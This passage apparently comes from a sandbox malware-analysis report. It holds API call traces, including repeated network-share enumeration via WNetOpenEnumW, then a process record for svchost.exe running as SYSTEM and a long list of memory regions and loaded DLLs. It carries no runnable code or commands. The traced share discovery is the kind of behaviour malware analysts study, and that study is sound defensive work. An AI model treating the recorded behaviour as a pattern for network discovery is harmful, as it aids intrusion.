(in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cddb40 | out: hHeap=0x620000) returned 1 [0182.378] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7cd50 | out: hHeap=0x620000) returned 1 [0182.378] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cddb40 [0182.378] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cddb88 [0182.379] WNetOpenEnumW (in: dwScope=0x2, dwType=0x0, dwUsage=0x0, lpNetResource=0x2e842a8, lphEnum=0x322fe28 | out: lphEnum=0x322fe28*=0x322fe44) returned 0x4b8 [0198.878] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cddaf8 | out: hHeap=0x620000) returned 1 [0198.878] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cddab0 | out: hHeap=0x620000) returned 1 [0198.878] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0198.878] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0198.879] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x150) returned 0x655b18 [0198.879] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cddab0 [0198.879] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cddaf8 [0198.879] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e94ba0 [0198.879] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e8f2b8 [0198.879] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cddc18 | out: hHeap=0x620000) returned 1 [0198.880] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cddbd0 | out: hHeap=0x620000) returned 1 [0198.880] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cddb88 | out: hHeap=0x620000) returned 1 [0198.880] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cddb40 | out: hHeap=0x620000) returned 1 [0198.881] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x656f80 | out: hHeap=0x620000) returned 1 [0198.881] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd95d8 [0198.881] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9680 [0198.881] WNetOpenEnumW (in: dwScope=0x2, dwType=0x0, dwUsage=0x0, lpNetResource=0x2e842c8, lphEnum=0x322fe28 | out: lphEnum=0x322fe28*=0x322fe44) returned 0x4c6 [0198.885] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0198.886] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0198.886] WNetEnumResourceW (in: hEnum=0x2cfe0c0, lpcCount=0x322fedc, lpBuffer=0x2e84288, lpBufferSize=0x322fed8 | out: lpcCount=0x322fedc, lpBuffer=0x2e84288, lpBufferSize=0x322fed8) returned 0x103 [0198.886] WNetCloseEnum (hEnum=0x2cfe0c0) returned 0x0 [0198.886] SendMessageW (hWnd=0x20100, Msg=0x8004, wParam=0x0, lParam=0x0) returned 0x0 Process: id = "12" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x28bb4000" os_pid = "0x330" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "rpc_server" parent_id = "11" os_parent_pid = "0x1c8" cmd_line = "C:\\Windows\\system32\\svchost.exe -k netsvcs" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BDESVC" [0xa], "NT SERVICE\\BITS" [0xa], "NT SERVICE\\CertPropSvc" [0xa], "NT SERVICE\\EapHost" [0xa], "NT SERVICE\\hkmsvc" [0xa], "NT SERVICE\\IKEEXT" [0xa], "NT SERVICE\\iphlpsvc" [0xa], "NT SERVICE\\LanmanServer" [0xa], "NT SERVICE\\MMCSS" [0xe], "NT SERVICE\\MSiSCSI" [0xa], "NT SERVICE\\RasAuto" [0xa], "NT SERVICE\\RasMan" [0xa], "NT SERVICE\\RemoteAccess" [0xa], "NT SERVICE\\Schedule" [0xa], "NT SERVICE\\SCPolicySvc" [0xa], "NT SERVICE\\SENS" [0xa], "NT SERVICE\\SessionEnv" [0xa], "NT SERVICE\\SharedAccess" [0xa], "NT SERVICE\\ShellHWDetection" [0xa], "NT SERVICE\\wercplsupport" [0xa], "NT SERVICE\\Winmgmt" [0xa], "NT SERVICE\\wuauserv" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000da19" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Region: id = 2025 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 2026 start_va = 0x20000 end_va = 0x20fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "svchost.exe.mui" filename = "\\Windows\\System32\\en-US\\svchost.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\svchost.exe.mui") Region: id = 2027 start_va = 0x30000 end_va = 0x33fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 2028 start_va = 0x40000 end_va = 0x40fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 2029 start_va = 0x50000 end_va = 0x50fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 2030 start_va = 0x60000 end_va = 0x60fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 2031 start_va = 0x70000 end_va = 0x70fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000070000" filename = "" Region: id = 2032 start_va = 0x80000 end_va = 0x80fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000080000" filename = "" Region: id = 2033 start_va = 0x90000 end_va = 0x90fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000090000" filename = "" Region: id = 2034 start_va = 0xa0000 end_va = 0xaafff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "gpsvc.dll.mui" filename = "\\Windows\\System32\\en-US\\gpsvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\gpsvc.dll.mui") Region: id = 2035 start_va = 0xb0000 end_va = 0x12ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000b0000" filename = "" Region: id = 2036 start_va = 0x130000 end_va = 0x13cfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "setupapi.dll.mui" filename = "\\Windows\\System32\\en-US\\setupapi.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\setupapi.dll.mui") Region: id = 2037 start_va = 0x140000 end_va = 0x143fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "taskcomp.dll.mui" filename = "\\Windows\\System32\\en-US\\taskcomp.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\taskcomp.dll.mui") Region: id = 2038 start_va = 0x150000 end_va = 0x159fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "schedsvc.dll.mui" filename = "\\Windows\\System32\\en-US\\schedsvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\schedsvc.dll.mui") Region: id = 2039 start_va = 0x160000 end_va = 0x160fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000160000" filename = "" Region: id = 2040 start_va = 0x170000 end_va = 0x171fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000170000" filename = "" Region: id = 2041 start_va = 0x180000 end_va = 0x183fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 2042 start_va = 0x190000 end_va = 0x28ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000190000" filename = "" Region: id = 2043 start_va = 0x290000 end_va = 0x2f6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 2044 start_va = 0x300000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000300000" filename = "" Region: id = 2045 start_va = 0x400000 end_va = 0x401fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 2046 start_va = 0x410000 end_va = 0x43ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000015.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000015.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000015.db") Region: id = 2047 start_va = 0x440000 end_va = 0x443fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 2048 start_va = 0x450000 end_va = 0x45dfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "propsys.dll.mui" filename = "\\Windows\\System32\\en-US\\propsys.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\propsys.dll.mui") Region: id = 2049 start_va = 0x460000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 2050 start_va = 0x470000 end_va = 0x5f7fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 2051 start_va = 0x600000 end_va = 0x780fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000600000" filename = "" Region: id = 2052 start_va = 0x790000 end_va = 0x84ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000790000" filename = "" Region: id = 2053 start_va = 0x850000 end_va = 0x8cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000850000" filename = "" Region: id = 2054 start_va = 0x8d0000 end_va = 0x8d7fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "vsstrace.dll.mui" filename = "\\Windows\\System32\\en-US\\vsstrace.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\vsstrace.dll.mui") Region: id = 2055 start_va = 0x8e0000 end_va = 0x8e0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000008e0000" filename = "" Region: id = 2056 start_va = 0x8f0000 end_va = 0x96ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000008f0000" filename = "" Region: id = 2057 start_va = 0x970000 end_va = 0x98bfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "firewallapi.dll.mui" filename = "\\Windows\\System32\\en-US\\FirewallAPI.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\firewallapi.dll.mui") Region: id = 2058 start_va = 0x990000 end_va = 0xa0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000990000" filename = "" Region: id = 2059 start_va = 0xa10000 end_va = 0xa8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000a10000" filename = "" Region: id = 2060 start_va = 0xab0000 end_va = 0xb2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000ab0000" filename = "" Region: id = 2061 start_va = 0xb30000 end_va = 0xb95fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000002.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db") Region: id = 2062 start_va = 0xba0000 end_va = 0xc1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000ba0000" filename = "" Region: id = 2063 start_va = 0xc20000 end_va = 0xeeefff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 2064 start_va = 0xf30000 end_va = 0xfaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000f30000" filename = "" Region: id = 2065 start_va = 0x1000000 end_va = 0x107ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001000000" filename = "" Region: id = 2066 start_va = 0x1090000 end_va = 0x110ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001090000" filename = "" Region: id = 2067 start_va = 0x1130000 end_va = 0x11affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001130000" filename = "" Region: id = 2068 start_va = 0x11c0000 end_va = 0x123ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000011c0000" filename = "" Region: id = 2069 start_va = 0x1290000 end_va = 0x129ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001290000" filename = "" Region: id = 2070 start_va = 0x12b0000 end_va = 0x132ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000012b0000" filename = "" Region: id = 2071 start_va = 0x1360000 end_va = 0x136ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001360000" filename = "" Region: id = 2072 start_va = 0x13b0000 end_va = 0x142ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000013b0000" filename = "" Region: id = 2073 start_va = 0x1430000 end_va = 0x14affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001430000" filename = "" Region: id = 2074 start_va = 0x1510000 end_va = 0x158ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001510000" filename = "" Region: id = 2075 start_va = 0x1590000 end_va = 0x160ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001590000" filename = "" Region: id = 2076 start_va = 0x1640000 end_va = 0x16bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001640000" filename = "" Region: id = 2077 start_va = 0x16c0000 end_va = 0x173ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000016c0000" filename = "" Region: id = 2078 start_va = 0x17b0000 end_va = 0x182ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000017b0000" filename = "" Region: id = 2079 start_va = 0x1830000 end_va = 0x192ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001830000" filename = "" Region: id = 2080 start_va = 0x1950000 end_va = 0x19cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001950000" filename = "" Region: id = 2081 start_va = 0x19e0000 end_va = 0x1a5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000019e0000" filename = "" Region: id = 2082 start_va = 0x1a60000 end_va = 0x1adffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001a60000" filename = "" Region: id = 2083 start_va = 0x1b30000 end_va = 0x1baffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001b30000" filename = "" Region: id = 2084 start_va = 0x1bb0000 end_va = 0x1c2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001bb0000" filename = "" Region: id = 2085 start_va = 0x1c30000 end_va = 0x1caffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001c30000" filename = "" Region: id = 2086 start_va = 0x1cb0000 end_va = 0x1d2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001cb0000" filename = "" Region: id = 2087 start_va = 0x1d60000 end_va = 0x1ddffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001d60000" filename = "" Region: id = 2088 start_va = 0x1de0000 end_va = 0x1e5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001de0000" filename = "" Region: id = 2089 start_va = 0x1e90000 end_va = 0x1f0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e90000" filename = "" Region: id = 2090 start_va = 0x1f80000 end_va = 0x1ffffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001f80000" filename = "" Region: id = 2091 start_va = 0x2030000 end_va = 0x20affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002030000" filename = "" Region: id = 2092 start_va = 0x20b0000 end_va = 0x212ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000020b0000" filename = "" Region: id = 2093 start_va = 0x2130000 end_va = 0x21affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002130000" filename = "" Region: id = 2094 start_va = 0x21b0000 end_va = 0x22affff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000021b0000" filename = "" Region: id = 2095 start_va = 0x22e0000 end_va = 0x235ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000022e0000" filename = "" Region: id = 2096 start_va = 0x2390000 end_va = 0x239ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002390000" filename = "" Region: id = 2097 start_va = 0x2440000 end_va = 0x24bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002440000" filename = "" Region: id = 2098 start_va = 0x24d0000 end_va = 0x254ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000024d0000" filename = "" Region: id = 2099 start_va = 0x2550000 end_va = 0x264ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002550000" filename = "" Region: id = 2100 start_va = 0x26d0000 end_va = 0x274ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000026d0000" filename = "" Region: id = 2101 start_va = 0x2750000 end_va = 0x27cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002750000" filename = "" Region: id = 2102 start_va = 0x2800000 end_va = 0x287ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002800000" filename = "" Region: id = 2103 start_va = 0x2880000 end_va = 0x288ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002880000" filename = "" Region: id = 2104 start_va = 0x2890000 end_va = 0x290ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002890000" filename = "" Region: id = 2105 start_va = 0x2940000 end_va = 0x29bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002940000" filename = "" Region: id = 2106 start_va = 0x29c0000 end_va = 0x2abffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000029c0000" filename = "" Region: id = 2107 start_va = 0x2ad0000 end_va = 0x2b4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002ad0000" filename = "" Region: id = 2108 start_va = 0x2bd0000 end_va = 0x2c4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002bd0000" filename = "" Region: id = 2109 start_va = 0x2c70000 end_va = 0x2ceffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002c70000" filename = "" Region: id = 2110 start_va = 0x2cf0000 end_va = 0x2eeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002cf0000" filename = "" Region: id = 2111 start_va = 0x2ef0000 end_va = 0x2feffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002ef0000" filename = "" Region: id = 2112 start_va = 0x2ff0000 end_va = 0x30effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002ff0000" filename = "" Region: id = 2113 start_va = 0x3100000 end_va = 0x317ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003100000" filename = "" Region: id = 2114 start_va = 0x31a0000 end_va = 0x321ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000031a0000" filename = "" Region: id = 2115 start_va = 0x3270000 end_va = 0x32effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003270000" filename = "" Region: id = 2116 start_va = 0x3300000 end_va = 0x337ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003300000" filename = "" Region: id = 2117 start_va = 0x33e0000 end_va = 0x345ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000033e0000" filename = "" Region: id = 2118 start_va = 0x3470000 end_va = 0x34effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003470000" filename = "" Region: id = 2119 start_va = 0x3500000 end_va = 0x357ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003500000" filename = "" Region: id = 2120 start_va = 0x35e0000 end_va = 0x365ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000035e0000" filename = "" Region: id = 2121 start_va = 0x3690000 end_va = 0x370ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003690000" filename = "" Region: id = 2122 start_va = 0x3710000 end_va = 0x378ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003710000" filename = "" Region: id = 2123 start_va = 0x3800000 end_va = 0x387ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003800000" filename = "" Region: id = 2124 start_va = 0x38a0000 end_va = 0x391ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000038a0000" filename = "" Region: id = 2125 start_va = 0x39b0000 end_va = 0x3a2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000039b0000" filename = "" Region: id = 2126 start_va = 0x3aa0000 end_va = 0x3b1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003aa0000" filename = "" Region: id = 2127 start_va = 0x3c50000 end_va = 0x3ccffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003c50000" filename = "" Region: id = 2128 start_va = 0x76f00000 end_va = 0x7701efff monitored = 0 entry_point = 0x76f15340 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 2129 start_va = 0x77020000 end_va = 0x77119fff monitored = 0 entry_point = 0x7703a2c8 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 2130 start_va = 0x77120000 end_va = 0x772c8fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 2131 start_va = 0x7efe0000 end_va = 0x7f0dffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 2132 start_va = 0x7f0e0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 2133 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 2134 start_va = 0xff8d0000 end_va = 0xff8dafff monitored = 0 entry_point = 0xff8d246c region_type = mapped_file name = "svchost.exe" filename = "\\Windows\\System32\\svchost.exe" (normalized: "c:\\windows\\system32\\svchost.exe") Region: id = 2135 start_va = 0x7fef73d0000 end_va = 0x7fef7440fff monitored = 0 entry_point = 0x7fef74151d0 region_type = mapped_file name = "wbemess.dll" filename = "\\Windows\\System32\\wbem\\wbemess.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemess.dll") Region: id = 2136 start_va = 0x7fef7450000 end_va = 0x7fef7461fff monitored = 0 entry_point = 0x7fef74589d0 region_type = mapped_file name = "ncobjapi.dll" filename = "\\Windows\\System32\\ncobjapi.dll" (normalized: "c:\\windows\\system32\\ncobjapi.dll") Region: id = 2137 start_va = 0x7fef7470000 end_va = 0x7fef7524fff monitored = 0 entry_point = 0x7fef74ecf80 region_type = mapped_file name = "wmiprvsd.dll" filename = "\\Windows\\System32\\wbem\\WmiPrvSD.dll" (normalized: "c:\\windows\\system32\\wbem\\wmiprvsd.dll") Region: id = 2138 start_va = 0x7fef7530000 end_va = 0x7fef761dfff monitored = 0 entry_point = 0x7fef75312a0 region_type = mapped_file name = "actxprxy.dll" filename = "\\Windows\\System32\\actxprxy.dll" (normalized: "c:\\windows\\system32\\actxprxy.dll") Region: id = 2139 start_va = 0x7fef7990000 end_va = 0x7fef79fafff monitored = 0 entry_point = 0x7fef79d4344 region_type = mapped_file name = "hnetcfg.dll" filename = "\\Windows\\System32\\hnetcfg.dll" (normalized: "c:\\windows\\system32\\hnetcfg.dll") Region: id = 2140 start_va = 0x7fef7a00000 end_va = 0x7fef7a73fff monitored = 0 entry_point = 0x7fef7a066f0 region_type = mapped_file name = "netprofm.dll" filename = "\\Windows\\System32\\netprofm.dll" (normalized: "c:\\windows\\system32\\netprofm.dll") Region: id = 2141 start_va = 0x7fef7a80000 end_va = 0x7fef7b03fff monitored = 0 entry_point = 0x7fef7ad1118 region_type = mapped_file name = "netcfgx.dll" filename = "\\Windows\\System32\\netcfgx.dll" (normalized: "c:\\windows\\system32\\netcfgx.dll") Region: id = 2142 start_va = 0x7fef7b90000 end_va = 0x7fef7ba2fff monitored = 0 entry_point = 0x7fef7b91d80 region_type = mapped_file name = "wbemsvc.dll" filename = "\\Windows\\System32\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemsvc.dll") Region: id = 2143 start_va = 0x7fef7bb0000 end_va = 0x7fef7c11fff monitored = 0 entry_point = 0x7fef7bebd80 region_type = mapped_file name = "esscli.dll" filename = "\\Windows\\System32\\wbem\\esscli.dll" (normalized: "c:\\windows\\system32\\wbem\\esscli.dll") Region: id = 2144 start_va = 0x7fef7c20000 end_va = 0x7fef7d4bfff monitored = 0 entry_point = 0x7fef7cd0ef0 region_type = mapped_file name = "wbemcore.dll" filename = "\\Windows\\System32\\wbem\\wbemcore.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemcore.dll") Region: id = 2145 start_va = 0x7fef9250000 end_va = 0x7fef9296fff monitored = 0 entry_point = 0x7fef9251040 region_type = mapped_file name = "wdscore.dll" filename = "\\Windows\\System32\\wdscore.dll" (normalized: "c:\\windows\\system32\\wdscore.dll") Region: id = 2146 start_va = 0x7fef9470000 end_va = 0x7fef94b1fff monitored = 0 entry_point = 0x7fef94717e4 region_type = mapped_file name = "sqmapi.dll" filename = "\\Windows\\System32\\sqmapi.dll" (normalized: "c:\\windows\\system32\\sqmapi.dll") Region: id = 2147 start_va = 0x7fef94c0000 end_va = 0x7fef94cdfff monitored = 0 entry_point = 0x7fef94c5500 region_type = mapped_file name = "wbemprox.dll" filename = "\\Windows\\System32\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemprox.dll") Region: id = 2148 start_va = 0x7fef94d0000 end_va = 0x7fef94f6fff monitored = 0 entry_point = 0x7fef94d11a0 region_type = mapped_file name = "ntdsapi.dll" filename = "\\Windows\\System32\\ntdsapi.dll" (normalized: "c:\\windows\\system32\\ntdsapi.dll") Region: id = 2149 start_va = 0x7fef9500000 end_va = 0x7fef95d2fff monitored = 0 entry_point = 0x7fef9578b00 region_type = mapped_file name = "fastprox.dll" filename = "\\Windows\\System32\\wbem\\fastprox.dll" (normalized: "c:\\windows\\system32\\wbem\\fastprox.dll") Region: id = 2150 start_va = 0x7fef9620000 end_va = 0x7fef96b1fff monitored = 0 entry_point = 0x7fef96951ec region_type = mapped_file name = "iphlpsvc.dll" filename = "\\Windows\\System32\\iphlpsvc.dll" (normalized: "c:\\windows\\system32\\iphlpsvc.dll") Region: id = 2151 start_va = 0x7fef9a20000 end_va = 0x7fef9a38fff monitored = 0 entry_point = 0x7fef9a21104 region_type = mapped_file name = "resutils.dll" filename = "\\Windows\\System32\\resutils.dll" (normalized: "c:\\windows\\system32\\resutils.dll") Region: id = 2152 start_va = 0x7fef9a40000 end_va = 0x7fef9a8ffff monitored = 0 entry_point = 0x7fef9a41190 region_type = mapped_file name = "clusapi.dll" filename = "\\Windows\\System32\\clusapi.dll" (normalized: "c:\\windows\\system32\\clusapi.dll") Region: id = 2153 start_va = 0x7fef9a90000 end_va = 0x7fef9a97fff monitored = 0 entry_point = 0x7fef9a91020 region_type = mapped_file name = "sscore.dll" filename = "\\Windows\\System32\\sscore.dll" (normalized: "c:\\windows\\system32\\sscore.dll") Region: id = 2154 start_va = 0x7fef9aa0000 end_va = 0x7fef9ac4fff monitored = 0 entry_point = 0x7fef9ab8c54 region_type = mapped_file name = "browser.dll" filename = "\\Windows\\System32\\browser.dll" (normalized: "c:\\windows\\system32\\browser.dll") Region: id = 2155 start_va = 0x7fef9ad0000 end_va = 0x7fef9b0cfff monitored = 0 entry_point = 0x7fef9ad1070 region_type = mapped_file name = "srvsvc.dll" filename = "\\Windows\\System32\\srvsvc.dll" (normalized: "c:\\windows\\system32\\srvsvc.dll") Region: id = 2156 start_va = 0x7fef9b20000 end_va = 0x7fef9b27fff monitored = 0 entry_point = 